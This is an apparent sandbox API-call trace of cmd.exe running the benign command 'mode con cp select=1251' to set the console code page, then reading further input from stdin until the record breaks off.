_wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0262.463] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0262.463] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0262.463] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0262.463] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0262.463] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0262.463] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0262.463] _wcsicmp (_String1="mode", _String2="START") returned -6 [0262.463] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0262.463] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0262.464] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0262.464] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0262.464] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0262.464] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0262.464] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0262.464] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0262.464] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0262.464] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0262.464] _wcsicmp (_String1="mode", _String2="FOR") returned 7 [0262.464] _wcsicmp (_String1="mode", _String2="IF") returned 4 [0262.464] _wcsicmp (_String1="mode", _String2="REM") returned -5 [0262.464] GetProcessHeap () returned 0x280000 [0262.464] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x218) returned 0x29aae0 [0262.464] GetProcessHeap () returned 0x280000 [0262.464] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x42) returned 0x299900 [0262.464] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10 [0262.464] GetProcessHeap () returned 0x280000 [0262.464] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x420) returned 0x29b310 [0262.464] SetErrorMode (uMode=0x0) returned 0x0 [0262.464] SetErrorMode (uMode=0x1) returned 0x0 [0262.464] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x29b320, lpFilePart=0x1befd0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1befd0*="system32") returned 0x13 [0262.464] SetErrorMode (uMode=0x0) returned 0x1 [0262.464] GetProcessHeap () returned 0x280000 [0262.464] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x29b310, Size=0x42) returned 0x29b310 [0262.465] GetProcessHeap () returned 0x280000 [0262.465] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29b310) returned 0x42 [0262.465] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a08f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0262.465] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0262.465] GetProcessHeap () returned 0x280000 [0262.465] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x104) returned 0x295bb0 [0262.465] GetProcessHeap () returned 0x280000 [0262.465] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1f8) returned 0x299c60 [0262.470] GetProcessHeap () returned 0x280000 [0262.470] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x299c60, Size=0x106) returned 0x299c60 [0262.470] GetProcessHeap () returned 0x280000 [0262.470] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x299c60) returned 0x106 [0262.470] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a08f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0262.470] GetProcessHeap () returned 0x280000 [0262.470] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xe8) returned 0x299d80 [0262.470] GetProcessHeap () returned 0x280000 [0262.470] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x299d80, Size=0x7e) returned 0x299d80 [0262.470] GetProcessHeap () returned 0x280000 [0262.470] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x299d80) returned 0x7e [0262.472] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0262.472] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x1bed40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bed40) returned 0x295cc0 [0262.472] GetProcessHeap () returned 0x280000 [0262.473] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x28) returned 0x294660 [0262.473] FindClose (in: hFindFile=0x295cc0 | out: hFindFile=0x295cc0) returned 1 [0262.473] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.COM", fInfoLevelId=0x1, lpFindFileData=0x1bed40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bed40) returned 0x295cc0 [0262.473] GetProcessHeap () returned 0x280000 [0262.473] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x294660, Size=0x8) returned 0x299950 [0262.473] FindClose (in: hFindFile=0x295cc0 | out: hFindFile=0x295cc0) returned 1 [0262.473] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0262.473] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0262.473] GetConsoleTitleW (in: lpConsoleTitle=0x1bf290, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0262.473] GetProcessHeap () returned 0x280000 [0262.473] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x21c) returned 0x29b370 [0262.473] GetConsoleTitleW (in: lpConsoleTitle=0x29b380, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0262.473] GetProcessHeap () returned 0x280000 [0262.473] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x29b370, Size=0x8a) returned 0x29b370 [0262.473] GetProcessHeap () returned 0x280000 [0262.473] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29b370) returned 0x8a [0262.473] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe - mode con cp select=1251") returned 1 [0262.474] GetProcessHeap () returned 0x280000 [0262.474] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29b370 | out: hHeap=0x280000) returned 1 [0262.474] InitializeProcThreadAttributeList (in: lpAttributeList=0x1bf048, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1bf008 | out: lpAttributeList=0x1bf048, lpSize=0x1bf008) returned 1 [0262.474] UpdateProcThreadAttribute (in: lpAttributeList=0x1bf048, dwFlags=0x0, Attribute=0x60001, lpValue=0x1beff8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1bf048, lpPreviousValue=0x0) returned 1 [0262.474] GetStartupInfoW (in: lpStartupInfo=0x1bf160 | out: lpStartupInfo=0x1bf160*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4)) [0262.474] GetProcessHeap () returned 0x280000 [0262.474] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x20) returned 0x294660 [0262.474] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0262.474] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0262.474] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0262.474] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0262.474] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0262.474] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0262.474] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0262.474] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0262.474] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0262.474] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0262.474] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0262.474] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0262.474] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0262.474] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0262.475] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0262.475] GetProcessHeap () returned 0x280000 [0262.475] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294660 | out: hHeap=0x280000) returned 1 [0262.475] GetProcessHeap () returned 0x280000 [0262.475] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x12) returned 0x298940 [0262.475] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\mode.com", lpCommandLine="mode con cp select=1251", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1bf080*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="mode con cp select=1251", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1bf030 | out: lpCommandLine="mode con cp select=1251", lpProcessInformation=0x1bf030*(hProcess=0x54, hThread=0x50, dwProcessId=0x644, dwThreadId=0x648)) returned 1 [0262.481] CloseHandle (hObject=0x50) returned 1 [0262.481] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0262.481] GetProcessHeap () returned 0x280000 [0262.481] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x298aa0 | out: hHeap=0x280000) returned 1 [0262.481] GetEnvironmentStringsW () returned 0x298aa0* [0262.481] GetProcessHeap () returned 0x280000 [0262.481] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xafc) returned 0x29b370 [0262.481] FreeEnvironmentStringsW (penv=0x298aa0) returned 1 [0262.481] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x777c0000 [0262.482] GetProcAddress (hModule=0x777c0000, lpProcName="NtQueryInformationProcess") returned 0x778114a0 [0262.482] NtQueryInformationProcess (in: ProcessHandle=0x54, ProcessInformationClass=0x0, ProcessInformation=0x1be938, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x1be938, ReturnLength=0x0) returned 0x0 [0262.482] ReadProcessMemory (in: hProcess=0x54, lpBaseAddress=0x7fffffdb000, lpBuffer=0x1be970, nSize=0x380, lpNumberOfBytesRead=0x1be930 | out: lpBuffer=0x1be970*, lpNumberOfBytesRead=0x1be930*=0x380) returned 1 [0262.482] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0262.850] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1bef78 | out: lpExitCode=0x1bef78*=0x0) returned 1 [0262.850] CloseHandle (hObject=0x54) returned 1 [0262.850] _vsnwprintf (in: _Buffer=0x1bf1e8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1bef88 | out: _Buffer="00000000") returned 8 [0262.850] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0262.850] GetProcessHeap () returned 0x280000 [0262.850] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29b370 | out: hHeap=0x280000) returned 1 [0262.850] GetEnvironmentStringsW () returned 0x29e9b0* [0262.850] GetProcessHeap () returned 0x280000 [0262.850] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb22) returned 0x29f4e0 [0262.850] FreeEnvironmentStringsW (penv=0x29e9b0) returned 1 [0262.850] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0262.850] GetProcessHeap () returned 0x280000 [0262.850] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29f4e0 | out: hHeap=0x280000) returned 1 [0262.850] GetEnvironmentStringsW () returned 0x29e9b0* [0262.850] GetProcessHeap () returned 0x280000 [0262.850] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb22) returned 0x29f4e0 [0262.850] FreeEnvironmentStringsW (penv=0x29e9b0) returned 1 [0262.850] GetProcessHeap () returned 0x280000 [0262.850] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x298940 | out: hHeap=0x280000) returned 1 [0262.850] DeleteProcThreadAttributeList (in: lpAttributeList=0x1bf048 | out: lpAttributeList=0x1bf048) [0262.851] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 1 [0262.851] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.851] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0262.851] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.851] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x4a08e194 | out: lpMode=0x4a08e194) returned 0 [0262.851] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.851] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x4a08e198 | out: lpMode=0x4a08e198) returned 0 [0262.851] GetConsoleOutputCP () returned 0x4e3 [0262.851] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a09bfe0 | out: lpCPInfo=0x4a09bfe0) returned 1 [0262.852] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0262.852] GetProcessHeap () returned 0x280000 [0262.852] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x299d80 | out: hHeap=0x280000) returned 1 [0262.852] GetProcessHeap () returned 0x280000 [0262.852] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x299c60 | out: hHeap=0x280000) returned 1 [0262.852] GetProcessHeap () returned 0x280000 [0262.852] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295bb0 | out: hHeap=0x280000) returned 1 [0262.852] GetProcessHeap () returned 0x280000 [0262.852] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29b310 | out: hHeap=0x280000) returned 1 [0262.852] GetProcessHeap () returned 0x280000 [0262.852] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x299900 | out: hHeap=0x280000) returned 1 [0262.852] GetProcessHeap () returned 0x280000 [0262.852] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29aae0 | out: hHeap=0x280000) returned 1 [0262.852] GetProcessHeap () returned 0x280000 [0262.852] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x296550 | out: hHeap=0x280000) returned 1 [0262.852] GetProcessHeap () returned 0x280000 [0262.852] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294630 | out: hHeap=0x280000) returned 1 [0262.852] GetProcessHeap () returned 0x280000 [0262.852] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x299840 | out: hHeap=0x280000) returned 1 [0262.852] _vsnwprintf (in: _Buffer=0x4a0a6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1bf4a8 | out: _Buffer="\r\n") returned 2 [0262.852] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.852] GetFileType (hFile=0xf4) returned 0x3 [0262.852] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.853] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a09c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0262.853] WriteFile (in: hFile=0xf4, lpBuffer=0x4a09c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1bf478, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesWritten=0x1bf478*=0x2, lpOverlapped=0x0) returned 1 [0262.853] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a08f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0262.853] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a09c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0262.853] _vsnwprintf (in: _Buffer=0x4a08eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1bf4b8 | out: _Buffer="C:\\Windows\\system32") returned 19 [0262.853] _vsnwprintf (in: _Buffer=0x4a08eb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x1bf4b8 | out: _Buffer=">") returned 1 [0262.853] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.853] GetFileType (hFile=0xf4) returned 0x3 [0262.853] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.853] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4a09c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21 [0262.853] WriteFile (in: hFile=0xf4, lpBuffer=0x4a09c320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x1bf4a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesWritten=0x1bf4a8*=0x14, lpOverlapped=0x0) returned 1 [0262.853] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.853] GetFileType (hFile=0xe8) returned 0x3 [0262.853] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.853] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.853] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.853] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e320, cchWideChar=1 | out: lpWideCharStr="vode con cp select=1251\n") returned 1 [0262.853] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.853] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.853] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.853] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e322, cchWideChar=1 | out: lpWideCharStr="sde con cp select=1251\n") returned 1 [0262.853] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.853] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.853] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.853] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e324, cchWideChar=1 | out: lpWideCharStr="se con cp select=1251\n") returned 1 [0262.853] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.853] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.853] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.853] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e326, cchWideChar=1 | out: lpWideCharStr="a con cp select=1251\n") returned 1 [0262.853] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.854] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.854] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.854] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e328, cchWideChar=1 | out: lpWideCharStr="dcon cp select=1251\n") returned 1 [0262.854] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.854] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.854] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.854] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e32a, cchWideChar=1 | out: lpWideCharStr="mon cp select=1251\n") returned 1 [0262.854] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.854] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.854] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.854] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e32c, cchWideChar=1 | out: lpWideCharStr="in cp select=1251\n") returned 1 [0262.854] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.854] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.854] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.854] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e32e, cchWideChar=1 | out: lpWideCharStr="n cp select=1251\n") returned 1 [0262.854] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.854] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.854] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.854] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e330, cchWideChar=1 | out: lpWideCharStr=" cp select=1251\n") returned 1 [0262.854] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.854] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.854] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1bf7a8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesRead=0x1bf7a8*=0x1, lpOverlapped=0x0) returned 1 [0262.854] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a09c320, cbMultiByte=1, lpWideCharStr=0x4a09e332, cchWideChar=1 | out: lpWideCharStr="dp select=1251\n") returned 1 [0262.854] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.854] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0262.854] ReadFile (in: hFile=0xe8, lpBuffer=0x4a09c320, 